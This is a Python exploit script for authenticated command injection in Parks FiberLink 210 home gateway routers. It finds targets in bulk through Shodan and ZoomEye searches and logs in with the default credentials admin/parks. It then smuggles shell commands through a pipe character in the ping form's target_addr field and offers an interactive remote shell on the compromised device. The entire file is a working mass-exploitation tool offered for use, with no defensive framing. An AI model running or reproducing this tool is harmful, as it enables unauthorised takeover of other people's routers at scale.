import os import sys import requests import argparse import urllib.parse from shodan import Shodan from rich.table import Table from zoomeye.sdk import ZoomEye from rich.console import Console from rich.progress import Progress from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from prompt_toolkit.history import InMemoryHistory from concurrent.futures import ThreadPoolExecutor, as_completed class Exploiter: def __init__(self, args): self.args = args self.output = args.output if args.output else 'vulnerable.txt' self.console = Console() self.CMD = 'echo "VULNERABLE"' self.shodan = Shodan(os.environ.get("SHODAN_API_KEY")) if args.shodan else None self.zoomeye = ZoomEye(api_key=os.environ.get("ZOOMEYE_API_KEY")) if args.zoomeye else None self.targets = [] self.vulnerable_hosts = [] self.exploitation_results = {} self.executor = ThreadPoolExecutor(max_workers=args.threads) def run(self): if self.args.shodan: self.generate_targets_shodan() if self.args.zoomeye: self.generate_targets_zoomeye() if self.args.target: self.targets.append(self.args.target) with ThreadPoolExecutor(max_workers=self.args.threads) as executor: futures = {executor.submit(self.exploit_target, target) for target in self.targets} for future in as_completed(futures): try: future.result() except Exception as e: self.console.print(f"Error occurred: {e}") self.print_vulnerable_hosts() def print_vulnerable_hosts(self): table = Table(title="Vulnerable Hosts") table.add_column("Host", justify="right", style="cyan") table.add_column("Command Output", style="magenta") with open(self.output, "w") as f: for host, cmd_output in self.exploitation_results.items(): f.write(host + '\n') table.add_row(host, cmd_output) self.console.print(table) def generate_targets_zoomeye(self): if self.zoomeye: self.console.print(f"[bold yellow]Searching with ZoomEye API on {self.args.pages} pages[/bold yellow]") self.zoomeye.multi_page_search('title:"Home Gateway" +banner:"login_parks.css"', page=self.args.pages, resource="host") services = self.zoomeye.dork_filter("ip,port") for service in services: self.targets.append(f"{service[0]}:{service[1]}") self.console.print(f"[bold green]Found Hosts: {len(self.targets)}[/bold green]") else: self.console.print("[bold red]Error: Zoomeye API key not found[/bold red]") self.console.print("To add the Zoomeye API key, export it as an environment variable:\n") self.console.print("export ZOOMEYE_API_KEY=Your_Zoomeye_API_Key") sys.exit(1) def generate_targets_shodan(self): if self.shodan: self.console.print(f"[bold yellow] Searching with Shodan API on {self.args.pages} page(s)...[/bold yellow]") for page in range(1, self.args.pages+1): for service in self.shodan.search_cursor('http.title:"Home Gateway" http.html:"login_parks.css"'): self.targets.append(f"{service['ip_str']}:{service['port']}") self.console.print(f"Found Hosts: {len(self.targets)}") else: self.console.print("[bold red]Error: Shodan API key not found[/bold red]") self.console.print("To add the Shodan API key, export it as an environment variable:\n") self.console.print("export SHODAN_API_KEY=Your_Shodan_API_Key") sys.exit(1) def login(self, url, username, password): headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = {'username': username, 'psd': password} response = requests.post(f'{url}/boaform/admin/formLogin', headers=headers, data=data, verify=False, timeout=3) return not ("bad password" in response.text.lower() or response.status_code == 403) def check(self, url): response = requests.get(f'{url}/status_device_basic_info.asp', verify=False, timeout=3) return not ('V2.1.15_X000' in response.text) def trigger(self, url, interface, cmd): headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = self.create_data_string('localhost', cmd, interface) response = requests.post(f'{url}/boaform/admin/formPing', headers=headers, data=data, verify=False, timeout=3) self.console.print(f"[bold green]Command sent on {url}[/bold green]") if self.args.target else None cmd_output = self.get_text(response.text, 'pre') try: if "VULNERABLE" in cmd_output: self.console.print(f"[bold green]{url} : {cmd_output}[/bold green]") if not self.args.target else None self.vulnerable_hosts.append(url) self.exploitation_results[url] = cmd_output if self.args.target: self.interactive(url, interface) else: self.console.print(cmd_output) if not self.interactive else None except: cmd_output = "[bold red]Error: No output![/bold red]" return cmd_output def get_interface(self, url): headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = '\r\n' response = requests.get(f'{url}/diag_ping_admin.asp', headers=headers, data=data, verify=False, timeout=3) return self.get_text(response.text, 'option') def create_data_string(self, target_addr, cmd, waninf): template = "target_addr={target_addr}&waninf={waninf}" encoded_target_addr = urllib.parse.quote(target_addr + '|' + cmd) encoded_waninf = urllib.parse.quote(waninf) return template.format(target_addr=encoded_target_addr, waninf=encoded_waninf) def get_text(self, html_content, tag): start_tag = f'<{tag}' end_tag = f'' start_index = html_content.find(start_tag) if start_index == -1: return None start_index = html_content.find(">", start_index) + 1 end_index = html_content.find(end_tag, start_index) if end_index == -1: return None return html_content[start_index:end_index].strip() def interactive(self, url, interface): session = PromptSession(history=InMemoryHistory()) self.interactive = True while True: try: cmd = session.prompt(HTML('# ')) self.CMD = cmd if "exit" in cmd: raise KeyboardInterrupt elif not cmd: continue elif "clear" in cmd: if os.name == 'posix': os.system('clear') elif os.name == 'nt': os.system('cls') else: result = self.trigger(url, interface, cmd) self.console.print(result) except KeyboardInterrupt: self.console.print("[bold yellow][!] Exiting shell...[/bold yellow]") break def exploit_target(self, target): for protocol in ['https://', 'http://']: url = f"{protocol}{target}" try: if not self.login(url, self.args.user, self.args.password): self.console.print(f"[red]Wrong credentials for {target}![/red]") if self.args.target else None return if not self.check(url): self.console.print(f"[red]{target} is not vulnerable![/red]") if self.args.target else None return self.console.print(f"[green]Successfully authenticated on {target}[/green]") interface = self.get_interface(url) if interface is None: self.console.print(f"[red]No valid interfaces for {target}![/red]") if self.args.target else None return self.console.print(f"[green]Using {interface} interface on {target}[/green]") if self.args.target else None self.trigger(url, interface, self.CMD) except Exception as e: self.console.print(f"[red]Error connecting to {target}: {e}[/red]") if self.args.target else None def parse_arguments(): parser = argparse.ArgumentParser(description='Authenticated Command Injection for Parks FiberLink 210') parser.add_argument("--shodan", action="store_true", help="Shodan API key") parser.add_argument("--zoomeye", action="store_true", help="ZoomEye API key") parser.add_argument('--target', help='Specify a single target URL') parser.add_argument("--threads", default=100, type=int, help="Number of threads (default: 10)") parser.add_argument("--pages", default=1, type=int, help="Number of pages to search in (ZoomEye or Shodan) (default: 1)") parser.add_argument("--user", default="admin", help="Username (default: admin)") parser.add_argument("--password", default="parks", help="Password (default: parks)") parser.add_argument("--output", help="Output file: default: 'vulnerable.txt'") return parser.parse_args() def main(): args = parse_arguments() exploiter = Exploiter(args) exploiter.run() if __name__ == '__main__': main()